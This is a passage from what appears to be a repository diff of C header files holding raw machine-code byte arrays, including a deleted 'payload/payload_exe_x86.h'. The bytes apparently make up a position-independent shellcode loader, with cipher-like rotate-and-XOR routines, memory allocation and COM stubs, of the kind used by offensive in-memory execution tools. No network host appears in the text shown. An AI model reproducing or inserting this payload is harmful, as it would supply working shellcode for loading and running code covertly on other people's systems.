1253 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
1254 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
1255 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc,
1256 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03,
1257 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b,
1258 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xdc, 0x01, 0xc2,
1259 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xdc, 0xc1,
1260 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31, 0xd0, 0x89, 0x45, 0xdc,
1261 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xe4, 0xc1, 0xc8, 0x08,
1262 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45,
1263 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xec,
1264 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xe4, 0x8b,
1265 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
1266 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1267 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1268 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45,
1269 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf0,
1270 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
1271 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0x8b,
1272 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1273 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40, 0x75, 0x73, 0xb8, 0x10,
1274 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc1, 0x48, 0x8d, 0x55, 0xd0,
1275 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00,
1276 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xbe, 0xfd, 0xff, 0xff, 0x8b, 0x45,
1277 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d, 0xf0, 0x0b, 0x76, 0x2b,
1278 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8,
1279 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
1280 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
1281 0x89, 0xc1, 0xe8, 0x85, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0xc1, 0xe0,
1282 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10, 0x00, 0x00, 0x00, 0x83,
1283 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0,
1284 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xf0, 0x88,
1285 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83, 0x45, 0xf4, 0x01, 0x83,
1286 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45,
1287 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45,
1288 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00,
1289 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83,
1290 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
1291 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1292 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1293 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8,
1294 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc,
1295 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
1296 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, 0x95, 0x00, 0x00,
1297 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, 0x8b, 0x0a, 0x8b,
1298 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1299 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, 0x89, 0x10, 0x83,
1300 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, 0xc7, 0x45, 0xfc,
1301 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1302 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b,
1303 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45,
1304 0xf0, 0x48, 0x8d, 0x50, 0x04, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
1305 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
1306 0x8b, 0x00, 0x31, 0xc8, 0x89, 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1307 0xc0, 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a,
1308 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x01, 0xca,
1309 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x48, 0x8b,
1310 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1,
1311 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31,
1312 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48,
1313 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, 0x48, 0x8b, 0x55,
1314 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x01, 0xca, 0x89, 0x10, 0x48,
1315 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2, 0x48, 0x8b,
1316 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b,
1317 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x8d, 0x50, 0x0c,
1318 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0,
1319 0x0d, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x31, 0xc8, 0x89,
1320 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x55,
1321 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, 0x07,
1322 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, 0xca,
1323 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x8b,
1324 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0xc1, 0xc2, 0x10, 0x89,
1325 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x0f, 0x0f, 0x86, 0xda,
1326 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42,
1327 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
1328 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c,
1329 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca,
1330 0x8b, 0x0a, 0x8b, 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00,
1331 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca,
1332 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8,
1333 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1334 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1335 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48,
1336 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xe8, 0xe9,
1337 0xd4, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb,
1338 0x1d, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1339 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x88, 0x54,
1340 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x7e, 0xdd,
1341 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
1342 0x9c, 0xfd, 0xff, 0xff, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x83, 0x7d,
1343 0x28, 0x10, 0x48, 0x0f, 0x46, 0x45, 0x28, 0x89, 0x45, 0xe4, 0xc7, 0x45,
1344 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x45, 0xf4, 0x48, 0x63,
1345 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x48,
1346 0x63, 0xc8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc8, 0x0f, 0xb6, 0x08,
1347 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x0f, 0xb6, 0x44, 0x05, 0xd0, 0x31, 0xc8,
1348 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xe4,
1349 0x7c, 0xc9, 0x8b, 0x45, 0xe4, 0x48, 0x98, 0x48, 0x29, 0x45, 0x28, 0x8b,
1350 0x45, 0xe4, 0x48, 0x98, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10,
1351 0x00, 0x00, 0x00, 0xeb, 0x25, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x8d,
1352 0x50, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1353 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02,
1354 0xeb, 0x0a, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x7f, 0xd5,
1355 0x48, 0x83, 0x7d, 0x28, 0x00, 0x0f, 0x85, 0x21, 0xff, 0xff, 0xff, 0x90,
1356 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
1357 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1358 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1359 0x00, 0x00, 0x00, 0x00};
1360
+0
-638
payload/payload_exe_x86.h less more
0
1 unsigned char PAYLOAD_EXE_X86[] = {
2 0x83, 0xec, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x7c, 0x24, 0x34, 0xff,
3 0x77, 0x2c, 0xff, 0x77, 0x28, 0xff, 0x77, 0x4c, 0xff, 0x77, 0x48, 0x57,
4 0xe8, 0xd1, 0x1a, 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8b, 0xf0, 0xff, 0x77,
5 0x28, 0xff, 0x77, 0x54, 0xff, 0x77, 0x50, 0x57, 0xe8, 0xbd, 0x1a, 0x00,
6 0x00, 0x83, 0xc4, 0x28, 0x8b, 0xd8, 0x89, 0x5c, 0x24, 0x34, 0x85, 0xf6,
7 0x0f, 0x84, 0x15, 0x02, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x84, 0x0d, 0x02,
8 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x37, 0x6a,
9 0x00, 0xff, 0xd6, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xf6, 0x01, 0x00,
10 0x00, 0xff, 0x37, 0x57, 0x56, 0xe8, 0x17, 0x1d, 0x00, 0x00, 0x6a, 0x20,
11 0x8d, 0x44, 0x24, 0x20, 0x6a, 0x00, 0x50, 0xe8, 0x2d, 0x1d, 0x00, 0x00,
12 0x8b, 0x06, 0x8d, 0xae, 0x30, 0x02, 0x00, 0x00, 0x2d, 0x30, 0x02, 0x00,
13 0x00, 0x50, 0x55, 0x8d, 0x46, 0x14, 0x50, 0x8d, 0x46, 0x04, 0x50, 0xe8,
14 0xec, 0x1b, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x18, 0x06, 0x00,
15 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb5, 0x1a, 0x00, 0x00, 0x83, 0xc4,
16 0x34, 0x3b, 0x86, 0x18, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x4f, 0x01, 0x00,
17 0x00, 0x3b, 0x96, 0x1c, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x43, 0x01, 0x00,
18 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76, 0x34, 0xff, 0x76,
19 0x30, 0x56, 0xe8, 0x1b, 0x1a, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x46,
20 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x76, 0x01, 0x00, 0x00, 0x33, 0xff, 0x39,
21 0xbe, 0x34, 0x02, 0x00, 0x00, 0x76, 0x16, 0x8d, 0x9e, 0x38, 0x02, 0x00,
22 0x00, 0x53, 0xff, 0x56, 0x30, 0x47, 0x83, 0xc3, 0x20, 0x3b, 0xbe, 0x34,
23 0x02, 0x00, 0x00, 0x72, 0xf0, 0x33, 0xdb, 0x43, 0x39, 0x5d, 0x00, 0x76,
24 0x34, 0x8d, 0x6e, 0x34, 0x8d, 0x7e, 0x38, 0xff, 0x76, 0x2c, 0xff, 0x76,
25 0x28, 0xff, 0x77, 0x04, 0xff, 0x37, 0x56, 0xe8, 0xce, 0x19, 0x00, 0x00,
26 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xd2, 0x00,
27 0x00, 0x00, 0x43, 0x83, 0xc7, 0x08, 0x83, 0xc5, 0x04, 0x3b, 0x9e, 0x30,
28 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x86, 0x0c, 0x05, 0x00, 0x00, 0x6a,
29 0x02, 0x5b, 0x3b, 0xc3, 0x75, 0x15, 0x56, 0xe8, 0x29, 0x05, 0x00, 0x00,
30 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x0c,
31 0x05, 0x00, 0x00, 0x8d, 0xbe, 0x48, 0x07, 0x00, 0x00, 0x83, 0xf8, 0x01,
32 0x74, 0x02, 0x8b, 0x3f, 0x83, 0xbe, 0x40, 0x03, 0x00, 0x00, 0x01, 0x74,
33 0x26, 0x56, 0xe8, 0x32, 0x03, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08,
34 0x39, 0x9e, 0x40, 0x03, 0x00, 0x00, 0x74, 0x78, 0x56, 0xe8, 0x05, 0x04,
35 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, 0x39, 0x9e, 0x40, 0x03, 0x00,
36 0x00, 0x74, 0x65, 0x83, 0x3f, 0x03, 0x74, 0x59, 0x83, 0x3f, 0x04, 0x74,
37 0x54, 0x83, 0x3f, 0x01, 0x74, 0x23, 0x39, 0x1f, 0x74, 0x1f, 0x83, 0x3f,
38 0x05, 0x74, 0x12, 0x83, 0x3f, 0x06, 0x74, 0x0d, 0x83, 0x3f, 0x07, 0x75,
39 0x43, 0x56, 0xe8, 0xe5, 0x17, 0x00, 0x00, 0xeb, 0x3a, 0x56, 0xe8, 0x4c,
40 0x16, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8,
41 0xe7, 0x0c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x44,
42 0x24, 0x10, 0x50, 0x56, 0xe8, 0xe1, 0x0e, 0x00, 0x00, 0x59, 0x59, 0x8d,
43 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, 0x5d, 0x08, 0x00, 0x00, 0x59, 0xeb,
44 0x06, 0x56, 0xe8, 0x91, 0x11, 0x00, 0x00, 0x59, 0x8b, 0x5c, 0x24, 0x34,
45 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x02, 0xbf, 0x00, 0xc0, 0x00, 0x00,
46 0x75, 0x2e, 0x8b, 0x86, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x24,
47 0xff, 0xb6, 0x40, 0x07, 0x00, 0x00, 0x6a, 0x00, 0x50, 0xe8, 0x7b, 0x1b,
48 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x57, 0x6a, 0x00, 0xff, 0xb6, 0x48, 0x07,
49 0x00, 0x00, 0xff, 0x56, 0x40, 0x83, 0xa6, 0x48, 0x07, 0x00, 0x00, 0x00,
50 0xff, 0x36, 0x6a, 0x00, 0x56, 0xe8, 0x5b, 0x1b, 0x00, 0x00, 0x83, 0xc4,
51 0x0c, 0x57, 0x6a, 0x00, 0x56, 0xff, 0xd3, 0x33, 0xc0, 0xeb, 0x03, 0x83,
52 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x20, 0xc3, 0x8b, 0x44,
53 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
54 0x00, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10,
55 0x02, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85,
56 0xff, 0x74, 0x1b, 0x8b, 0x46, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04,
57 0x8b, 0x46, 0x14, 0x89, 0x07, 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b,
58 0x7d, 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
59 0x0d, 0x83, 0xc6, 0x0c, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37,
60 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04,
61 0x8b, 0x40, 0x28, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01,
62 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x08, 0x18, 0x00, 0x00,
63 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x13, 0x14, 0x40, 0x00, 0xbf, 0xe4, 0x2a,
64 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0xed,
65 0x17, 0x00, 0x00, 0xb9, 0x62, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
66 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0xda, 0x17, 0x00, 0x00, 0xb9, 0x72,
67 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08,
68 0xe8, 0xc7, 0x17, 0x00, 0x00, 0xb9, 0xc0, 0x12, 0x40, 0x00, 0x2b, 0xcf,
69 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xb4, 0x17, 0x00, 0x00,
70 0xb9, 0x76, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
71 0x48, 0x10, 0xe8, 0xa1, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, 0x40, 0x00,
72 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, 0x8e, 0x17,
73 0x00, 0x00, 0xb9, 0x0e, 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
74 0x06, 0x89, 0x48, 0x18, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12,
75 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8,
76 0x68, 0x17, 0x00, 0x00, 0xb9, 0xc3, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03,
77 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x55, 0x17, 0x00, 0x00, 0xb9,
78 0xbe, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
79 0x24, 0xe8, 0x42, 0x17, 0x00, 0x00, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0x2b,
80 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24,
81 0x08, 0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x28, 0x5e, 0xc3, 0x33, 0xc0,
82 0xc2, 0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56,
83 0x6a, 0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc,
84 0x8d, 0x45, 0xd4, 0x50, 0xe8, 0xc4, 0x19, 0x00, 0x00, 0x8b, 0x75, 0x0c,
85 0x8d, 0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50,
86 0x0c, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d,
87 0x4d, 0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33,
88 0xc0, 0x5e, 0xc9, 0xc2, 0x08, 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b,
89 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
90 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74,
91 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x28, 0x8b, 0x84, 0x97, 0xfc, 0x03, 0x00,
92 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee,
93 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84, 0x97, 0xac, 0x04, 0x00, 0x00, 0x3b,
94 0x04, 0x93, 0x75, 0x10, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31,
95 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8,
96 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c,
97 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2,
98 0x04, 0x00, 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
99 0x18, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3,
100 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00,
101 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56,
102 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x38, 0x03, 0x00, 0x00, 0x50, 0xff,
103 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
104 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0xac, 0x03, 0x00, 0x00, 0x50, 0x53,
105 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
106 0x00, 0xbf, 0x8e, 0x14, 0x40, 0x00, 0x81, 0xef, 0x82, 0x14, 0x40, 0x00,
107 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
108 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
109 0x00, 0x00, 0x57, 0xe8, 0xd8, 0x15, 0x00, 0x00, 0xb9, 0x82, 0x14, 0x40,
110 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
111 0x61, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
112 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xbc,
113 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
114 0x74, 0x49, 0xbf, 0xa4, 0x14, 0x40, 0x00, 0xbb, 0x98, 0x14, 0x40, 0x00,
115 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
116 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x7e, 0x15,
117 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
118 0xe8, 0x0c, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
